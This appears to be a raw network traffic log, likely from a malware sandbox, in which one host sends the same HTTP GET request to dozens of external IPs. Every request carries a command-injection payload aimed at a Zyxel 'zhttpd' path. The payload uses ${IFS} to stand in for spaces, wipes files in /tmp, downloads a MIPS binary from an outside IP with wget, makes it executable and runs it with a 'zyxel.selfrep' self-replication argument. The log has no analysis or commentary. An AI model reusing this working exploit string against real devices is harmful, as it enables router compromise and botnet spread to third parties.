                                        Jan 14, 2024 16:18:49.573331118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5655192.168.2.133410478.42.187.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573378086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5656192.168.2.1346168180.134.168.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573415041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5657192.168.2.133295838.49.104.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573465109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5658192.168.2.1350270185.196.97.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573508978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5659192.168.2.134316699.135.7.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573539972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5660192.168.2.1341726148.139.207.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573582888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5661192.168.2.1342504177.0.203.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573615074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5662192.168.2.1348280166.233.65.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573653936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5663192.168.2.135751647.12.176.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573678970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5664192.168.2.1347784217.216.47.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573720932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5665192.168.2.134088444.87.120.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573775053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5666192.168.2.135339482.86.235.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573841095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5667192.168.2.134314643.20.175.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573863983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5668192.168.2.135827020.50.223.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573911905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5669192.168.2.135296658.71.206.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.573960066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5670192.168.2.1338222177.55.88.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574008942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5671192.168.2.136009487.34.234.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574032068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5672192.168.2.135958820.252.124.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574081898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5673192.168.2.1358146111.200.30.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574115038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5674192.168.2.1352088183.49.170.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574172020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5675192.168.2.1341218114.67.202.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574218988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5676192.168.2.1333402149.111.0.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574237108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5677192.168.2.1342988207.238.192.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574285030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5678192.168.2.135363268.14.26.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574331045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5679192.168.2.133870290.127.66.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574381113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5680192.168.2.1351218132.1.193.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574415922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5681192.168.2.135236234.159.116.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574445009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5682192.168.2.134184814.246.166.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574498892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5683192.168.2.1359194111.37.166.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574542046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5684192.168.2.133892253.166.83.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574584007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5685192.168.2.1348454109.227.2.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574608088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5686192.168.2.1336508125.50.174.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574675083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5687192.168.2.1352238217.26.87.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574697018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5688192.168.2.135812238.191.20.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:49.574727058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5689192.168.2.1337822173.118.88.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584114075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5690192.168.2.1345950188.137.230.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584158897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5691192.168.2.1350850165.128.235.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584187984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5692192.168.2.1358424115.240.100.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584224939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5693192.168.2.1338284141.245.123.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584276915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5694192.168.2.133975419.162.59.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584321022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5695192.168.2.135773492.95.130.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584355116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5696192.168.2.134268672.30.243.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584389925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5697192.168.2.135059894.222.85.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584422112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5698192.168.2.1349552187.97.5.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584485054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5699192.168.2.134900061.119.250.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584556103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5700192.168.2.1336388192.38.41.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584578991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5701192.168.2.135597488.40.76.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584616899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5702192.168.2.1355016130.195.149.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584672928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5703192.168.2.13532725.141.202.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584726095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5704192.168.2.1343254156.166.93.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584774971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5705192.168.2.1359978140.180.49.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584798098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5706192.168.2.1342888193.17.250.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584867954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5707192.168.2.1357244201.199.184.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.584955931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5708192.168.2.134778462.58.47.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585002899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5709192.168.2.133723887.236.166.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585028887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5710192.168.2.1348144171.239.126.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585057020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5711192.168.2.133580692.142.190.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585100889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5712192.168.2.1353264175.250.25.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585143089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5713192.168.2.134423071.113.195.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585171938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5714192.168.2.134301889.66.57.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585196018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5715192.168.2.134947025.41.203.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585228920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5716192.168.2.1358472145.60.132.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.585295916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5717192.168.2.1336326199.238.182.242443
                                        TimestampBytes transferredDirectionData
